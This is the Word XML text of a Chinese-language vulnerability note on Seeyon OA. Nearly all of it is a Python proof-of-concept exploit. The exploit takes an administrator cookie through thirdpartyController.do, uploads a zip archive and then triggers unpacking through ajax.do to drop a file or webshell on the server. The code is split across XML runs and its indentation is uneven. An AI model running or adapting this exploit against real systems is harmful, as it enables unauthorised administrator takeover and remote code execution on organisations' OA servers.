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A7425" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4"/>
    <w:p w14:paraId="130690A0" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t>漏洞名称：致远oa Getshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE71427" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t>产品介绍：协同管理OA软件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FD07B1" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t>漏洞细节：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1CDDF4" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t>利用了两个漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607BAC82" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t>1）通过请求直接获取管理员权限cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0395F363" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t>2）通过上传一个压缩文件，调用接口进行文件在解压时会利用解压过程的漏洞利用获取webshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA6CF9E" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t>利用方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C77B225" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t>def seeyon_new_rce(targeturl):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FA15CC" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t>orgurl=targeturl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73232393" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t>#通过请求直接获取管理员权限cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2618B0F8" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">    targeturl=orgurl+'seeyon/thirdpartyController.do'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C49E998" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t>post='method=access&amp;enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&amp;clientPath=127.0.0.1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A933B57" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">    request = SendRequest(targeturl,post)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D58719D" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">    response = request.send()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250B7B4A" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">    rsp = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448584E6" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">    if response and response.code == 200 and 'set-cookie' in str(response.headers).lower():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51483C2D" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">        cookies =  get_response_cookies(response.headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B397545" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">  #上传压缩文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4654B99F" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">        targeturl=orgurl+'seeyon/fileUpload.do?method=processUpload'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B61F5A2" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">        base64post='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</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38191EC5" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">        myrandstr=random_str(8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BE3A04" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">        post=base64.b64decode(base64post).replace('v3xmaine.jsp',myrandstr+'.txt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC48C1C" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">        headers={'Content-Type': 'multipart/form-data; boundary=89ebce60-8174-4612-8dc3-717ce6a042ac','Cookie':cookies}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213FF427" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">        request = SendRequest(targeturl,data=post,headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8637D0" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">        response = request.send()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1117F085" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">        if  response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E72DC81" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">            try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778237EC" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                rsp = response.read(11 * 1000 * 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A84AA0" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">            except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2843B990" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                if ("IncompleteRead" in str(e)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49329032" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                    rsp = e.partial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D2A18F" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">            reg=re.compile('fileurls=fileurls\+","\+\'([\-\d]+)\'')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328CCB29" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">            matchs=reg.findall(rsp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5AA00F" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">            if matchs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BB5A2E" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                fileid=matchs[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7F84C9" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4"/>
    <w:p w14:paraId="2A15BFFA" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t>#触发文件解压漏洞，获取webshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F72B310" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">               targeturl=orgurl+'seeyon/ajax.do'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C2D1B" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                datestr=time.strftime('%Y-%m-%d')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6B1271" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                post='method=ajaxAction&amp;managerName=portalDesignerManager&amp;managerMethod=uploadPageLayoutAttachment&amp;arguments=%5B0%2C%22'+datestr+'%22%2C%22'+fileid+'%22%5D'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AF4447" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                headers={'Cookie':cookies}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDB3FB8" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                request = SendRequest(targeturl,data=post,headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79284D48" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                response = request.send()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A29C263" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                if response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1313ED" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                    rsp_headers=response.headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F03B46" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001EAD8C" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                        rsp = response.read(11 * 1000 * 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F4816B" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                    except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4615AA22" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                        if ("IncompleteRead" in str(e)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482CAE6C" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            rsp = e.partial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752C376E" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                    if response.code == 500 and ("Error on" in rsp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C575AC4" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                        testrule=orgurl+'seeyon/common/designer/pageLayout/'+myrandstr+'.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41E8F1" w14:textId="77777777" w:rsidR="007663F4" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                        if get_url_content(testrule):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B771D8E" w14:textId="41925A4A" w:rsidR="00B53B0C" w:rsidRDefault="007663F4" w:rsidP="007663F4">
      <w:r>
        <w:t xml:space="preserve">                            #漏洞存在</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B5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0C"/>
    <w:rsid w:val="007663F4"/>
    <w:rsid w:val="00B5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FD3EED-85F8-ED4C-9437-0BBCC3C8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50237</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>50237</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-09T08:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-09T08:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>